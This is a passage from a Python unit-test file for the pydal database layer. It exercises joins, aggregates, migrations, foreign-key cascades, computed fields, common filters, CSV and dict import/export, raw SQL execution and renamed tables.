self.assertEqual(tab2._dalname, "t2")
self.assertEqual(tab2._tablename, "test2")
self.assertEqual(tab2._rname, "tt")
tab1.insert(aa="foo")
tab1.insert(aa="bar")
result = db(tab1).select(tab1.aa, orderby=tab1.aa)
self.assertEqual(result.as_list(), [{"aa": "bar"}, {"aa": "foo"}])
if not IS_SQLITE:
db(tab1.aa == "foo").update(aa="baz")
result = db(tab1).select(tab1.aa, orderby=tab1.aa)
self.assertEqual(result.as_list(), [{"aa": "bar"}, {"aa": "baz"}])
db(tab1.aa == "bar").delete()
result = db(tab1).select(tab1.aa, orderby=tab1.aa)
self.assertEqual(result.as_list(), [{"aa": "baz"}])
else:
with self.assertRaises(SyntaxError):
db(tab1.aa == "foo").update(aa="baz")
with self.assertRaises(SyntaxError):
db(tab1.aa == "bar").delete()
tab2.insert(bb=123)
tab2.insert(bb=456)
result = db(tab2).select(tab2.bb, orderby=tab2.bb)
self.assertEqual(result.as_list(), [{"bb": 123}, {"bb": 456}])
if not IS_SQLITE:
db(tab2.bb == 456).update(bb=789)
result = db(tab2).select(tab2.bb, orderby=tab2.bb)
self.assertEqual(result.as_list(), [{"bb": 123}, {"bb": 789}])
db(tab2.bb == 123).delete()
result = db(tab2).select(tab2.bb, orderby=tab2.bb)
self.assertEqual(result.as_list(), [{"bb": 789}])
else:
with self.assertRaises(SyntaxError):
db(tab2.bb == 456).update(bb=789)
with self.assertRaises(SyntaxError):
db(tab2.bb == 123).delete()
class TestJoin(DALtest):
def testRun(self):
db = self.connect()
db.define_table("t1", Field("aa"))
db.define_table("t2", Field("aa"), Field("b", db.t1))
i1 = db.t1.insert(aa="1")
i2 = db.t1.insert(aa="2")
i3 = db.t1.insert(aa="3")
db.t2.insert(aa="4", b=i1)
db.t2.insert(aa="5", b=i2)
db.t2.insert(aa="6", b=i2)
self.assertEqual(
len(db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)), 3
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t1.aa, "2"
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t2.aa, "6"
)
self.assertEqual(
len(
db().select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)
),
4,
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t1.aa,
"2",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t2.aa,
"6",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t1.aa,
"3",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t2.aa,
None,
)
self.assertEqual(
len(
db().select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)
),
3,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[0]
._extra[db.t2.id.count()],
1,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[1]
._extra[db.t2.id.count()],
2,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[2]
._extra[db.t2.id.count()],
0,
)
db.t2.drop()
db.t1.drop()
db.define_table("person", Field("name"))
id = db.person.insert(name="max")
self.assertEqual(id.name, "max")
db.define_table("dog", Field("name"), Field("ownerperson", "reference person"))
db.dog.insert(name="skipper", ownerperson=1)
row = db(db.person.id == db.dog.ownerperson).select().first()
self.assertEqual(row[db.person.name], "max")
self.assertEqual(row["person.name"], "max")
db.dog.drop()
self.assertEqual(len(db.person._referenced_by), 0)
class TestMinMaxSumAvg(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "integer"))
self.assertEqual(db.tt.insert(aa=1), 1)
self.assertEqual(db.tt.insert(aa=2), 2)
self.assertEqual(db.tt.insert(aa=3), 3)
s = db.tt.aa.min()
self.assertEqual(db(db.tt.id > 0).select(s)[0]._extra[s], 1)
self.assertEqual(db(db.tt.id > 0).select(s).first()[s], 1)
self.assertEqual(db().select(s).first()[s], 1)
s = db.tt.aa.max()
self.assertEqual(db().select(s).first()[s], 3)
s = db.tt.aa.sum()
self.assertEqual(db().select(s).first()[s], 6)
s = db.tt.aa.count()
self.assertEqual(db().select(s).first()[s], 3)
s = db.tt.aa.avg()
self.assertEqual(db().select(s).first()[s], 2)
class TestMigrations(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), Field("BB"), migrate=".storage.table")
db.define_table(
"t1", Field("aa"), Field("BB"), migrate=".storage.rname", rname="foo"
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), migrate=".storage.table")
db.define_table("t1", Field("aa"), migrate=".storage.rname", rname="foo")
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), Field("b"), migrate=".storage.table")
db.define_table(
"t1", Field("aa"), Field("b"), migrate=".storage.rname", rname="foo"
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), Field("b", "text"), migrate=".storage.table")
db.define_table(
"t1", Field("aa"), Field("b", "text"), migrate=".storage.rname", rname="foo"
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa"), migrate=".storage.table")
db.define_table("t1", Field("aa"), migrate=".storage.rname", rname="foo")
db.tt.drop()
db.t1.drop()
db.commit()
db.close()
def testFieldRName(self):
def checkWrite(db, table, data):
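# insert the row, read it back through the renamed columns, verify the
# round-trip, then delete it again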
rowid = table.insert(**data)
query = table._id == rowid
fields = [table[x] for x in data.keys()]
row = db(query).select(*fields).first()
self.assertIsNot(row, None)
self.assertEqual(row.as_dict(), data)
db(query).delete()
# Create tables
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("BB", rname="fbb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("BB", rname="fbb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa1", BB="BB1")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.commit()
db.close()
# Drop field defined by CREATE TABLE
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa", rname="faa"), migrate=".storage.table")
db.define_table(
"t1", Field("aa", rname="faa"), migrate=".storage.rname", rname="foo"
)
data = dict(aa="aa2")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.commit()
db.close()
# Add new field
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("b", rname="fb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("b", rname="fb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa3", b="b3")
integrity = dict(aa="data", b="integrity")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.tt.insert(**integrity)
db.t1.insert(**integrity)
db.commit()
db.close()
if not IS_SQLITE:
# Change field type
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("b", "text", rname="fb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("b", "text", rname="fb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa4", b="b4")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
row = db(db.tt).select(*[db.tt[x] for x in integrity.keys()]).first()
self.assertIsNot(row, None)
self.assertEqual(row.as_dict(), integrity)
row2 = db(db.t1).select(*[db.t1[x] for x in integrity.keys()]).first()
self.assertIsNot(row2, None)
self.assertEqual(row2.as_dict(), integrity)
db.commit()
db.close()
if not IS_SQLITE:
# Change field rname
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table(
"tt",
Field("aa", rname="faa"),
Field("b", "text", rname="xb"),
migrate=".storage.table",
)
db.define_table(
"t1",
Field("aa", rname="faa"),
Field("b", "text", rname="xb"),
migrate=".storage.rname",
rname="foo",
)
data = dict(aa="aa4", b="b4")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
row = db(db.tt).select(*[db.tt[x] for x in integrity.keys()]).first()
self.assertIsNot(row, None)
self.assertEqual(row.as_dict(), integrity)
row2 = db(db.t1).select(*[db.t1[x] for x in integrity.keys()]).first()
self.assertIsNot(row2, None)
self.assertEqual(row2.as_dict(), integrity)
db.commit()
db.close()
# Drop field defined by ALTER TABLE
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("tt", Field("aa", rname="faa"), migrate=".storage.table")
db.define_table(
"t1", Field("aa", rname="faa"), migrate=".storage.rname", rname="foo"
)
data = dict(aa="aa5")
checkWrite(db, db.tt, data)
checkWrite(db, db.t1, data)
db.tt.drop()
db.t1.drop()
db.commit()
db.close()
def tearDown(self):
if os.path.exists(".storage.db"):
os.unlink(".storage.db")
if os.path.exists(".storage.table"):
os.unlink(".storage.table")
if os.path.exists(".storage.rname"):
os.unlink(".storage.rname")
class TestReference(DALtest):
def testRun(self):
scenarios = (
(True, "CASCADE"),
(False, "CASCADE"),
(False, "SET NULL"),
)
for (b, ondelete) in scenarios:
db = self.connect(bigint_id=b)
if DEFAULT_URI.startswith("mssql"):
# MSSQL rejects ON DELETE CASCADE on self-referencing keys
# (multiple cascade paths), so fall back to NO ACTION
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
db.define_table(
"tt", Field("name"), Field("aa", "reference tt", ondelete=ondelete)
)
db.commit()
x = db.tt.insert(name="xxx")
self.assertEqual(x.id, 1)
self.assertEqual(x["id"], 1)
x.aa = x
self.assertEqual(x.aa, 1)
x.update_record()
x1 = db.tt[1]
self.assertEqual(x1.aa, 1)
self.assertEqual(x1.aa.aa.aa.aa.aa.aa.name, "xxx")
y = db.tt.insert(name="yyy", aa=x1)
self.assertEqual(y.aa, x1.id)
if not DEFAULT_URI.startswith("mssql"):
self.assertEqual(db.tt.insert(name="zzz"), 3)
self.assertEqual(db(db.tt.name).count(), 3)
db(db.tt.id == x).delete()
expected_count = {
"SET NULL": 2,
"NO ACTION": 2,
"CASCADE": 1,
}
self.assertEqual(db(db.tt.name).count(), expected_count[ondelete])
if ondelete == "SET NULL":
self.assertEqual(db(db.tt.name == "yyy").select()[0].aa, None)
self.tearDown()
class TestClientLevelOps(DALtest):
def testRun(self):
db = self.connect()
db.define_table(
"tt",
Field("aa", represent=lambda x, r: "x" + x),
Field("bb", type="integer", represent=lambda x, r: "y" + str(x)),
)
db.commit()
db.tt.insert(aa="test", bb=1)
rows1 = db(db.tt.id < 0).select()
rows2 = db(db.tt.id > 0).select()
self.assertNotEqual(rows1, rows2)
rows1 = db(db.tt.id > 0).select()
rows2 = db(db.tt.id > 0).select()
self.assertEqual(rows1, rows2)
rows3 = rows1 + rows2
self.assertEqual(len(rows3), 2)
rows4 = rows1 | rows2
self.assertEqual(len(rows4), 1)
rows5 = rows1 & rows2
self.assertEqual(len(rows5), 1)
rows6 = rows1.find(lambda row: row.aa == "test")
self.assertEqual(len(rows6), 1)
rows7 = rows2.exclude(lambda row: row.aa == "test")
self.assertEqual(len(rows7), 1)
rows8 = rows5.sort(lambda row: row.aa)
self.assertEqual(len(rows8), 1)
def represent(f, v, r):
return "z" + str(v)
db.representers = {
"rows_render": represent,
}
db.tt.insert(aa="foo", bb=2)
rows = db(db.tt.id > 0).select()
exp1 = [
Row(aa="ztest", bb="z1", id=rows[0]["id"]),
Row(aa="zfoo", bb="z2", id=rows[1]["id"]),
]
exp2 = [
Row(aa="ztest", bb=1, id=rows[0]["id"]),
Row(aa="zfoo", bb=2, id=rows[1]["id"]),
]
exp3 = [
Row(aa="test", bb="z1", id=rows[0]["id"]),
Row(aa="foo", bb="z2", id=rows[1]["id"]),
]
self.assertEqual(rows.render(i=0), exp1[0])
self.assertEqual(rows.render(i=0, fields=[db.tt.aa, db.tt.bb]), exp1[0])
self.assertEqual(rows.render(i=0, fields=[db.tt.aa]), exp2[0])
self.assertEqual(rows.render(i=0, fields=[db.tt.bb]), exp3[0])
self.assertEqual(list(rows.render()), exp1)
self.assertEqual(list(rows.render(fields=[db.tt.aa, db.tt.bb])), exp1)
self.assertEqual(list(rows.render(fields=[db.tt.aa])), exp2)
self.assertEqual(list(rows.render(fields=[db.tt.bb])), exp3)
ret = rows.render(i=0)
rows = db(db.tt.id > 0).select()
rows.compact = False
row = rows[0]
self.assertIn("tt", row)
self.assertIn("id", row.tt)
self.assertNotIn("id", row)
rows.compact = True
row = rows[0]
self.assertNotIn("tt", row)
self.assertIn("id", row)
rows = db(db.tt.id > 0).select(db.tt.id.max())
rows.compact = False
row = rows[0]
self.assertNotIn("tt", row)
self.assertIn("_extra", row)
rows = db(db.tt.id > 0).select(db.tt.id.max())
rows.compact = True
row = rows[0]
self.assertNotIn("tt", row)
self.assertIn("_extra", row)
db.tt.drop()
db.define_table("tt", Field("aa"), Field.Virtual("bb", lambda row: ":p"))
db.tt.insert(aa="test")
rows = db(db.tt.id > 0).select()
row = rows.first()
self.assertNotIn("tt", row)
self.assertIn("id", row)
self.assertIn("bb", row)
rows.compact = False
row = rows.first()
self.assertIn("tt", row)
self.assertEqual(len(row.keys()), 1)
self.assertIn("id", row.tt)
self.assertIn("bb", row.tt)
self.assertNotIn("id", row)
self.assertNotIn("bb", row)
class TestVirtualFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
db.commit()
db.tt.insert(aa="test")
class Compute:
def a_upper(row):
return row.tt.aa.upper()
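# methods of an object appended to virtualfields become computed attributes
# on every selected row (here row.a_upper)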
db.tt.virtualfields.append(Compute())
assert db(db.tt.id > 0).select().first().a_upper == "TEST"
class TestComputedFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table(
"tt",
Field("aa"),
Field("bb", default="x"),
Field("cc", compute=lambda r: r.aa + r.bb),
)
db.commit()
id = db.tt.insert(aa="z")
self.assertEqual(db.tt[id].cc, "zx")
db.tt.drop()
db.commit()
# check that a computed field can refer to previously defined computed fields
db.define_table(
"tt",
Field("aa"),
Field("bb", default="x"),
Field("cc", compute=lambda r: r.aa + r.bb),
Field("dd", compute=lambda r: r.bb + r.cc),
)
db.commit()
id = db.tt.insert(aa="z")
self.assertEqual(db.tt[id].dd, "xzx")
class TestCommonFilters(DALtest):
def testRun(self):
db = self.connect()
db.define_table("t1", Field("aa", "integer"))
db.define_table("t2", Field("aa", "integer"), Field("b", db.t1))
i1 = db.t1.insert(aa=1)
i2 = db.t1.insert(aa=2)
i3 = db.t1.insert(aa=3)
db.t2.insert(aa=4, b=i1)
db.t2.insert(aa=5, b=i2)
db.t2.insert(aa=6, b=i2)
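# _common_filter is implicitly ANDed into every query involving the table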
db.t1._common_filter = lambda q: db.t1.aa > 1
self.assertEqual(db(db.t1).count(), 2)
self.assertEqual(db(db.t1).count(), 2)
q = db.t2.b == db.t1.id
self.assertEqual(db(q).count(), 2)
self.assertEqual(db(q).count(), 2)
self.assertEqual(len(db(db.t1).select(left=db.t2.on(q))), 3)
db.t2._common_filter = lambda q: db.t2.aa < 6
self.assertEqual(db(q).count(), 1)
self.assertEqual(db(q).count(), 1)
self.assertEqual(len(db(db.t1).select(left=db.t2.on(q))), 2)
# test delete
self.assertEqual(db(db.t2).count(), 2)
db(db.t2).delete()
self.assertEqual(db(db.t2).count(), 0)
db.t2._common_filter = None
self.assertEqual(db(db.t2).count(), 1)
# test update
db.t2.insert(aa=4, b=i1)
db.t2.insert(aa=5, b=i2)
db.t2._common_filter = lambda q: db.t2.aa < 6
self.assertEqual(db(db.t2).count(), 2)
db(db.t2).update(aa=6)
self.assertEqual(db(db.t2).count(), 0)
db.t2._common_filter = None
self.assertEqual(db(db.t2).count(), 3)
class TestImportExportFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table("person", Field("name"))
db.define_table("pet", Field("friend", db.person), Field("name"))
for n in range(2):
db(db.pet).delete()
db(db.person).delete()
for k in range(10):
id = db.person.insert(name=str(k))
db.pet.insert(friend=id, name=str(k))
db.commit()
stream = StringIO()
db.export_to_csv_file(stream)
db(db.pet).delete()
db(db.person).delete()
stream = StringIO(stream.getvalue())
db.import_from_csv_file(stream)
assert (
db(db.person.id == db.pet.friend)(db.person.name == db.pet.name).count()
== 10
)
class TestImportExportUuidFields(DALtest):
def testRun(self):
db = self.connect()
db.define_table("person", Field("name"), Field("uuid"))
db.define_table("pet", Field("friend", db.person), Field("name"))
for n in range(2):
db(db.pet).delete()
db(db.person).delete()
for k in range(10):
id = db.person.insert(name=str(k), uuid=str(k))
db.pet.insert(friend=id, name=str(k))
db.commit()
stream = StringIO()
db.export_to_csv_file(stream)
stream = StringIO(stream.getvalue())
db.import_from_csv_file(stream)
assert db(db.person).count() == 10
assert (
db(db.person.id == db.pet.friend)(db.person.name == db.pet.name).count()
== 20
)
class TestDALDictImportExport(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=["all"])
db.define_table("person", Field("name", default="Michael"), Field("uuid"))
db.define_table("pet", Field("friend", db.person), Field("name"))
dbdict = db.as_dict(flat=True, sanitize=False)
assert isinstance(dbdict, dict)
uri = dbdict["uri"]
assert isinstance(uri, basestring) and uri
assert len(dbdict["tables"]) == 2
assert len(dbdict["tables"][0]["fields"]) == 3
assert dbdict["tables"][0]["fields"][1]["type"] == db.person.name.type
assert dbdict["tables"][0]["fields"][1]["default"] == db.person.name.default
db2 = DAL(**dbdict)
assert len(db.tables) == len(db2.tables)
assert hasattr(db2, "pet") and isinstance(db2.pet, Table)
assert hasattr(db2.pet, "friend") and isinstance(db2.pet.friend, Field)
db.pet.drop()
db.commit()
db2.commit()
dbjson = db.as_json(sanitize=False)
assert isinstance(dbjson, basestring) and len(dbjson) > 0
db3 = DAL(**json.loads(dbjson))
assert hasattr(db3, "person") and hasattr(db3.person, "uuid")
assert db3.person.uuid.type == db.person.uuid.type
db3.person.drop()
db3.commit()
db3.close()
mpfc = "Monty Python's Flying Circus"
dbdict4 = {
"uri": DEFAULT_URI,
"tables": [
{
"tablename": "tvshow",
"fields": [
{"fieldname": "name", "default": mpfc},
{"fieldname": "rating", "type": "double"},
],
},
{
"tablename": "staff",
"fields": [
{"fieldname": "name", "default": "Michael"},
{"fieldname": "food", "default": "Spam"},
{"fieldname": "tvshow", "type": "reference tvshow"},
],
},
],
}
db4 = DAL(**dbdict4)
assert "staff" in db4.tables
assert "name" in db4.staff
assert db4.tvshow.rating.type == "double"
assert (
db4.tvshow.insert(),
db4.tvshow.insert(name="Loriot"),
db4.tvshow.insert(name="Il Mattatore"),
) == (1, 2, 3)
assert db4(db4.tvshow).select().first().id == 1
assert db4(db4.tvshow).select().first().name == mpfc
db4.staff.drop()
db4.tvshow.drop()
db4.commit()
dbdict5 = {"uri": DEFAULT_URI}
db5 = DAL(**dbdict5)
assert db5.tables in ([], None)
assert not (str(db5) in ("", None))
dbdict6 = {
"uri": DEFAULT_URI,
"tables": [
{"tablename": "staff"},
{
"tablename": "tvshow",
"fields": [
{"fieldname": "name"},
{"fieldname": "rating", "type": "double"},
],
},
],
}
db6 = DAL(**dbdict6)
assert len(db6["staff"].fields) == 1
assert "name" in db6["tvshow"].fields
assert db6.staff.insert() is not None
assert db6(db6.staff).select().first().id == 1
db6.staff.drop()
db6.tvshow.drop()
db6.commit()
db.close()
db2.close()
db4.close()
db5.close()
db6.close()
class TestSelectAsDict(DALtest):
def testSelect(self):
db = self.connect()
if IS_ORACLE:
# on Oracle, field names must be quoted in raw SQL if lowercase keys are
# wanted in the result
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
else:
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
class TestExecuteSQL(DALtest):
def testSelect(self):
if IS_ORACLE:
# see note on prior test
db = self.connect(DEFAULT_URI, entity_quoting=True)
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
'SELECT "id", "b_field", "a_field" FROM "a_table"', as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
rtn = db.executesql(
'select "id", "b_field", "a_field" from "a_table"', fields=db.a_table
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
'select "id", "b_field", "a_field" from "a_table"',
fields=db.a_table,
colnames=["a_table.id", "a_table.b_field", "a_table.a_field"],
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
'select COUNT(*) from "a_table"',
fields=[db.a_table.id.count()],
colnames=["foo"],
)
self.assertEqual(rtn[0].foo, 1)
if not IS_ORACLE:
db = self.connect(DEFAULT_URI, entity_quoting=False)
db.define_table(
"a_table",
Field("b_field"),
Field("a_field"),
)
db.a_table.insert(a_field="aa1", b_field="bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
rtn = db.executesql(
"SELECT id, b_field, a_field FROM a_table", as_ordered_dict=True
)
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(rtn[0]["b_field"], "bb1")
self.assertEqual(list(rtn[0].keys()), ["id", "b_field", "a_field"])
rtn = db.executesql(
"select id, b_field, a_field from a_table", fields=db.a_table
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
"select id, b_field, a_field from a_table",
fields=db.a_table,
colnames=["a_table.id", "a_table.b_field", "a_table.a_field"],
)
self.assertTrue(
all(x in rtn[0].keys() for x in ["id", "b_field", "a_field"])
)
self.assertEqual(rtn[0].b_field, "bb1")
rtn = db.executesql(
"select COUNT(*) from a_table",
fields=[db.a_table.id.count()],
colnames=["foo"],
)
self.assertEqual(rtn[0].foo, 1)
class TestRNameTable(DALtest):
# tests for highly experimental rname attribute
def testSelect(self):
db = self.connect()
rname = "a_very_complicated_tablename"
if IS_ORACLE:
# name size limitations
rname = "a_complex_tablename"
db.define_table("easy_name", Field("a_field"), rname=rname)
rtn = db.easy_name.insert(a_field="a")
self.assertEqual(rtn.id, 1)
rtn = db(db.easy_name.a_field == "a").select()
self.assertEqual(len(rtn), 1)
self.assertEqual(rtn[0].id, 1)
self.assertEqual(rtn[0].a_field, "a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).delete()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 0)
db.easy_name.insert(a_field="a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.a_field == "a").update(a_field="c")
rtn = db(db.easy_name.a_field == "c").count()
self.assertEqual(rtn, 1)
rtn = db(db.easy_name.a_field != "c").count()
self.assertEqual(rtn, 1)
avg = db.easy_name.id.avg()
rtn = db(db.easy_name.id > 0).select(avg)
self.assertEqual(rtn[0][avg], 3)
rname = "this_is_the_person_table"
db.define_table(
"person", Field("name", default="Michael"), Field("uuid"), rname=rname
)
rname = "this_is_the_pet_table"
db.define_table(
"pet", Field("friend", "reference person"), Field("name"), rname=rname
)
michael = db.person.insert() # default insert
john = db.person.insert(name="John")
luke = db.person.insert(name="Luke")
# michael owns Phippo
phippo = db.pet.insert(friend=michael, name="Phippo")
# john owns Dunstin and Gertie
dunstin = db.pet.insert(friend=john, name="Dunstin")
gertie = db.pet.insert(friend=john, name="Gertie")
rtn = db(db.person.id == db.pet.friend).select(orderby=db.person.id | db.pet.id)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# fetch owners, possibly with their pets
# main point is retrieving Luke with no pets
rtn = db(db.person.id > 0).select(
orderby=db.person.id | db.pet.id,
left=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[3].person.name, "Luke")
self.assertEqual(rtn[3].person.id, luke)
self.assertEqual(rtn[3].pet.name, None)
# let's test a subquery
subq = db(db.pet.name == "Gertie")._select(db.pet.friend)
rtn = db(db.person.id.belongs(subq)).select()
self.assertEqual(rtn[0].id, 2)
self.assertEqual(rtn[0]("person.name"), "John")
# as dict
rtn = db(db.person.id > 0).select().as_dict()
self.assertEqual(rtn[1]["name"], "Michael")
# as list
rtn = db(db.person.id > 0).select().as_list()
self.assertEqual(rtn[0]["name"], "Michael")
# isempty
rtn = db(db.person.id > 0).isempty()
self.assertEqual(rtn, False)
# join argument
rtn = db(db.person).select(
orderby=db.person.id | db.pet.id,
join=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# aliases
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
rname = "the_cubs"
db.define_table(
"pet_farm",
Field("name"),
Field("father", "reference pet_farm"),
Field("mother", "reference pet_farm"),
rname=rname,
)
minali = db.pet_farm.insert(name="Minali")
osbert = db.pet_farm.insert(name="Osbert")
# they had a cub
selina = db.pet_farm.insert(name="Selina", father=osbert, mother=minali)
father = db.pet_farm.with_alias("father")
mother = db.pet_farm.with_alias("mother")
# fetch pets with relatives
rtn = db().select(
db.pet_farm.name,
father.name,
mother.name,
left=[
father.on(father.id == db.pet_farm.father),
mother.on(mother.id == db.pet_farm.mother),
],
orderby=db.pet_farm.id,
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].pet_farm.name, "Minali")
self.assertEqual(rtn[0].father.name, None)
self.assertEqual(rtn[0].mother.name, None)
self.assertEqual(rtn[1].pet_farm.name, "Osbert")
self.assertEqual(rtn[2].pet_farm.name, "Selina")
self.assertEqual(rtn[2].father.name, "Osbert")
self.assertEqual(rtn[2].mother.name, "Minali")
def testJoin(self):
db = self.connect()
rname = "this_is_table_t1"
rname2 = "this_is_table_t2"
db.define_table("t1", Field("aa"), rname=rname)
db.define_table("t2", Field("aa"), Field("b", db.t1), rname=rname2)
i1 = db.t1.insert(aa="1")
i2 = db.t1.insert(aa="2")
i3 = db.t1.insert(aa="3")
db.t2.insert(aa="4", b=i1)
db.t2.insert(aa="5", b=i2)
db.t2.insert(aa="6", b=i2)
self.assertEqual(
len(db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)), 3
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t1.aa, "2"
)
self.assertEqual(
